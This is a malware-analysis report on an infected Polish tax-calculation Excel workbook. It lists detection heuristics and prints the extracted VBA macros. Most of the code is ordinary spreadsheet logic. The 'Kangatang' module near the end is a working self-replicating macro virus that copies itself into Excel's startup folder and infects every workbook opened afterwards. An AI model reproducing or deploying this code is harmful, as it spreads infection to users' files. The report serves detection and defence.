MALICIOUS
Risk Score: 264

Heuristics (8)

- ClamAV: Xls.Virus.Valyria-10007756-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Xls.Virus.Valyria-10007756-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings)
  Document contains a VBA project; VBA macros present.
- VBA copies the workbook into the Excel XLSTART startup folder (high, OLE_VBA_XLSTART_PERSISTENCE)
  The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
  Matched line in script:
  'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
- VBA infects other workbooks via an OnSheetActivate copy hook (high, OLE_VBA_WORKBOOK_INFECTION_SPREADER)
  The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
  Matched line in script:
  Application.OnSheetActivate = ""
- Workbook_Open macro (low, OLE_VBA_WBOPEN)
  Workbook_Open macro
  Matched line in script:
  Private Sub Workbook_Open()
- Auto_Open macro (low, OLE_VBA_AUTO)
  Auto_Open macro
  Matched line in script:
  Sub Auto_Open()
- External workbook data link (medium, OOXML_EXTERNAL_REL_DATALINK)
  External workbook reference in xl/externalLinks/_rels/externalLink1.xml.rels: file:///D:\dokumenty Magda\4. Starzy klienci\3. Empik\6. Podatek odroczony\9 wrzesień 2011\09 11 CIT FINAL.xlsm (a UNC/file path); opening the workbook and updating links could leak NetNTLM credentials to the host.
- Hidden worksheet (veryHidden, hidden) (low, OOXML_HIDDEN_SHEET)
  Excel workbook contains 7 hidden sheet(s); hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.

Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14814 bytes |

SHA-256: cf57579215acc9570d7a8fea9ca438216975ac348b9f5be168029796723cdcba

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub Workbook_Open()
Sheets("INPUT").Protect Password:="podatek1234", userinterfaceonly:=True
Sheets("CIT_OPER").Protect Password:="podatek1234", userinterfaceonly:=True
Sheets("CIT_KAPI").Protect Password:="podatek1234", userinterfaceonly:=True
End Sub
Attribute VB_Name = "Arkusz21"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Module8"
Option Explicit
Sub blokowanie()
Attribute blokowanie.VB_ProcData.VB_Invoke_Func = " \n14"
'
' blokowanie Macro
'
'
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True
End Sub
Attribute VB_Name = "Module4"
Option Explicit
Public Sub LoadBS()
Dim caption, Filter As String
Dim CustomerFilename As String
Dim targetWorkbook, customerWorkbook As Workbook
Dim targetSheet, sourceSheet As Worksheet
Dim Nazwa As String
'unlock all; on error lock all and display a message
'On Error GoTo eH
'For Each wks In ThisWorkbook.Worksheets
' wks.Unprotect "dkwis2016"
'Next wks
Sheets("RAKS_BS").Unprotect ("podatek1234")
Application.ScreenUpdating = False
caption = "Please Select an input file "
Filter = "Excel files (*.xls),*.xls"
MsgBox ("Wybierz plik z bilansem z RAKS za bieżący rok")
Set targetWorkbook = Application.ActiveWorkbook
Set targetSheet = targetWorkbook.Worksheets("RAKS_BS")
'MsgBox "Wybierz plik do ladowania bilansu"
CustomerFilename = Application.GetOpenFilename(Filter, , caption)
If CustomerFilename <> "False" Then
Set customerWorkbook = Application.Workbooks.Open(CustomerFilename)
Set sourceSheet = customerWorkbook.Worksheets(1)
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(170, "G")).UnMerge
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(170, "G")).Copy
targetSheet.Activate
ActiveSheet.Range("A1").Select
ActiveSheet.Paste
ActiveSheet.Range("A1:G170").Select
With Selection.Interior
.Pattern = xlNone
.TintAndShade = 0
.PatternTintAndShade = 0
End With
With Selection.Font
.ColorIndex = xlAutomatic
.TintAndShade = 0
End With
Application.CutCopyMode = False
Application.ScreenUpdating = True
ActiveSheet.Range("i1") = "Bilans załadowany dnia " & Date
Worksheets("INPUT").Activate
Sheets("RAKS_BS").Protect ("podatek1234")
'For Each wks In ThisWorkbook.Worksheets
' wks.Protect "dkwis2016"
'Next wks
Else
End If
Exit Sub
eH:
'For Each wks In ThisWorkbook.Worksheets
' wks.Protect "dkwis2016"
'Next wks
MsgBox "Wystąpił błąd wykonania.", vbExclamation
End Sub
Public Sub LoadPL()
Dim caption, Filter As String
Dim CustomerFilename As String
Dim targetWorkbook, customerWorkbook As Workbook
Dim targetSheet, sourceSheet As Worksheet
Application.ScreenUpdating = False
Sheets("RAKS_PL").Unprotect ("podatek1234")
caption = "Please Select an input file "
Filter = "Excel files (*.xls),*.xls"
Set targetWorkbook = Application.ActiveWorkbook
Set targetSheet = targetWorkbook.Worksheets("RAKS_PL")
MsgBox "Wybierz plik do ladowania rachunku wynikow"
CustomerFilename = Application.GetOpenFilename(Filter, , caption)
If CustomerFilename <> "False" Then
Set customerWorkbook = Application.Workbooks.Open(CustomerFilename)
Set sourceSheet = customerWorkbook.Worksheets(1)
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(100, "F")).UnMerge
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(100, "F")).Copy
targetSheet.Activate
ActiveSheet.Range("A1").Select
ActiveSheet.Paste
ActiveSheet.Range("A1:F100").Select
With Selection.Interior
.Pattern = xlNone
.TintAndShade = 0
.PatternTintAndShade = 0
End With
With Selection.Font
.ColorIndex = xlAutomatic
.TintAndShade = 0
End With
Application.CutCopyMode = False
Application.ScreenUpdating = True
customerWorkbook.Close savechanges:=False
ActiveSheet.Range("h1") = "Rachunek zysków załadowany dnia " & Date
Worksheets("INPUT").Activate
Sheets("RAKS_PL").Protect ("podatek1234")
Else
End If
End Sub
Public Sub LoadZOIS()
Dim caption, Filter As String
Dim CustomerFilename As String
Dim targetWorkbook, customerWorkbook As Workbook
Dim targetSheet, sourceSheet As Worksheet
Dim Finalrow As Integer
Application.ScreenUpdating = False
Sheets("ZOIS").Unprotect ("podatek1234")
caption = "Please Select an input file "
Filter = "Excel files (*.xls),*.xls"
Set targetWorkbook = Application.ActiveWorkbook
Set targetSheet = targetWorkbook.Worksheets("ZOIS")
MsgBox "Wybierz plik do ladowania obrotowki"
CustomerFilename = Application.GetOpenFilename(Filter, , caption)
If CustomerFilename <> "False" Then
Set customerWorkbook = Application.Workbooks.Open(CustomerFilename)
Set sourceSheet = customerWorkbook.Worksheets(1)
sourceSheet.Range(sourceSheet.Cells(1, "A"), sourceSheet.Cells(10000, "z")).Copy
targetSheet.Activate
ActiveSheet.Range("A1").Select
ActiveSheet.Paste
ActiveSheet.Range("A1:z10000").Select
With Selection.Interior
.Pattern = xlNone
.TintAndShade = 0
.PatternTintAndShade = 0
End With
With Selection.Font
.ColorIndex = xlAutomatic
.TintAndShade = 0
End With
Application.CutCopyMode = False
Application.ScreenUpdating = True
customerWorkbook.Close savechanges:=False
Finalrow = Cells(Rows.Count, 2).End(xlUp).Row 'Counts # of rows in the data set,
Cells(1, 1).UnMerge
ActiveSheet.Range("A:A").TextToColumns Destination:=ActiveSheet.Range("A1")
Range(Cells(3, 12).Address, Cells(Finalrow, 12).Address).Formula = "=j3-k3"
'Range(Cells(3, 13).Address, Cells(Finalrow, 13).Address).Formula = "=a3*1"
'Range(Cells(1, "M"), Cells(10000, "m")).Copy
'Range(Cells(1, "A"), Cells(10000, "A")).PasteValues
'Range(Cells(1, "M"), Cells(10000, "m")).Clear
ActiveSheet.Range("m1") = "Zestawienie obrotówi sald załadowane dnia " & Date
Worksheets("INPUT").Activate
'Sheets("ZOIS").Protect ("podatek1234")
Else
End If
End Sub
Attribute VB_Name = "Module9"
Sub copy_arkusz_for_client()
Attribute copy_arkusz_for_client.VB_ProcData.VB_Invoke_Func = " \n14"
'
' copy_arkusz_for_client Macro
'
'
Sheets("KALK_POD").Select
Sheets("KALK_POD").Copy
Windows("CIT_v2.10_Spółka_MIESIAC_ROK.xlsm").Activate
End Sub
Attribute VB_Name = "Arkusz5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Module6"
Attribute VB_Name = "Module5"
Option Explicit
Sub Ustawienia()
'Show/Hide capital CIT
If Worksheets("INPUT").Range("b36") = "TAK" Then
Application.ScreenUpdating = False
Worksheets("CIT_KAPI").Visible = True
Else
Worksheets("CIT_KAPI").Visible = False
Application.ScreenUpdating = True
End If
End Sub
'Show/Hide ZZWK
If Worksheets("WPR").Range("wariant_eq") = "TAK" Then
Application.ScreenUpdating = False
Worksheets("EQ").Visible = True
Aktywne_Pole_XML Worksheets("MapaXML").Range("U7", "W61"), "wlacz", 4
Else
Worksheets("EQ").Visible = False
Application.ScreenUpdating = True
Aktywne_Pole_XML Worksheets("MapaXML").Range("U7", "W61"), "wylacz", 4
Attribute VB_Name = "Arkusz8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Module1"
Option Explicit
Sub ukrywanie_sekcja_1()
Call odkrywanie_v2(7, 206)
End Sub
Sub ukrywanie_sekcja_2()
Call odkrywanie_v2(418, 617)
End Sub
Sub ukrywanie_sekcja_finans()
Call odkrywanie_v2(216, 415)
End Sub
Sub ukrywanie_sekcja_3()
Call odkrywanie_v2(620, 819)
End Sub
Sub ukrywanie_sekcja_4()
Call odkrywanie_v2(824, 1023)
End Sub
Sub ukrywanie_sekcja_5()
Call odkrywanie_v2(1028, 1227)
End Sub
Sub ukrywanie_sekcja_kap_1()
Call odkrywanie_v2(6, 205)
End Sub
Sub ukrywanie_sekcja_kap_2()
Call odkrywanie_v2(212, 411)
End Sub
Sub ukrywanie_sekcja_kap_3()
Call odkrywanie_v2(414, 613)
End Sub
Sub ukrywanie_sekcja_kap_4()
Call odkrywanie_v2(618, 817)
End Sub
Sub ukrywanie_sekcja_kap_5()
Call odkrywanie_v2(822, 1021)
End Sub
Sub odkrywanie_v2(poczatek As Integer, koniec As Integer)
Dim i As Integer
i = Application.InputBox("Liczba wierszy widocznych", "Cancel Test")
If i < 10 Then
MsgBox ("Minimalna liczba wierszy to 10")
Exit Sub ' does not process the lines of code
ElseIf i > 200 Then
MsgBox ("Maksymalna liczba wierszy to 200")
Exit Sub
ElseIf i = False Then
Exit Sub
End If
Rows(poczatek & ":" & poczatek + i - 1).Hidden = False
If i = 200 Then
Rows(poczatek + i - 1 & ":" & koniec).Hidden = False
Else
Rows(poczatek + i & ":" & koniec).Hidden = True
End If
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Attribute VB_Name = "Module2"
Option Explicit
Sub utworz_kopie_pliku()
Dim plik_biezacy As Workbook
Set plik_biezacy = ActiveWorkbook
Dim plik_wynikowy As Workbook
Set plik_wynikowy = Workbooks.Add
plik_biezacy.Activate
'loop over worksheets
Dim ark As Worksheet
For Each ark In Worksheets
'msgbox ark.Name
ark.Copy after:=plik_wynikowy.Sheets(plik_wynikowy.Sheets.Count)
Next
End Sub
Attribute VB_Name = "Module3"
Option Explicit
Sub haslowanie()
Dim pass As String
pass = InputBox("Podaj hasło")
Dim ark As Worksheet
For Each ark In Worksheets
ark.Protect pass, DrawingObjects:=True, Contents:=True, Scenarios:=False _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True
Worksheets("ZOIS").Unprotect (pass)
Worksheets("TABELA_AM_POD").Unprotect (pass)
Next
End Sub
Sub odhaslowanie()
Dim pass As String
pass = InputBox("Podaj hasło")
Dim ark As Worksheet
For Each ark In Worksheets
'ark.Unprotect pass, DrawingObjects:=True, Contents:=True, Scenarios:=False _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True
ark.Unprotect (pass)
Next
End Sub
Attribute VB_Name = "Module7"
Option Explicit
Sub mojPDF()
Dim Sciezka As String, Klient As String, Data As Date
Klient = ActiveSheet.Range("Klient")
Sciezka = ThisWorkbook.Path & "\"
Data = ActiveSheet.Range("Data")
ActiveSheet.ExportAsFixedFormat Type:=xlTypePDF, Filename:= _
Sciezka & Klient & " " & Data & "_INFO_CIT.pdf", _
Quality:=xlQualityStandard, IncludeDocProperties:=True, IgnorePrintAreas _
:=False, OpenAfterPublish:=True
End Sub
Sub mojPDF_OPER()
Dim Sciezka As String, Klient2 As String, Data2 As Date
Klient2 = ActiveSheet.Range("Klient2")
Sciezka = ThisWorkbook.Path & "\"
Data2 = ActiveSheet.Range("Data2")
ActiveSheet.ExportAsFixedFormat Type:=xlTypePDF, Filename:= _
Sciezka & Klient2 & " " & Data2 & "_INFO_CIT_OPER.pdf", _
Quality:=xlQualityStandard, IncludeDocProperties:=True, IgnorePrintAreas _
:=False, OpenAfterPublish:=True
End Sub
Attribute VB_Name = "Arkusz29"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Arkusz18"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Arkusz12"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 55808 bytes |

SHA-256: 8db18f0fbc4da27ae608ead208d25b1fbb64161691a237e74c13d48260cf6f12

Detection
ClamAV: Xls.Virus.Valyria-10007756-0
Obfuscation or payload: unlikely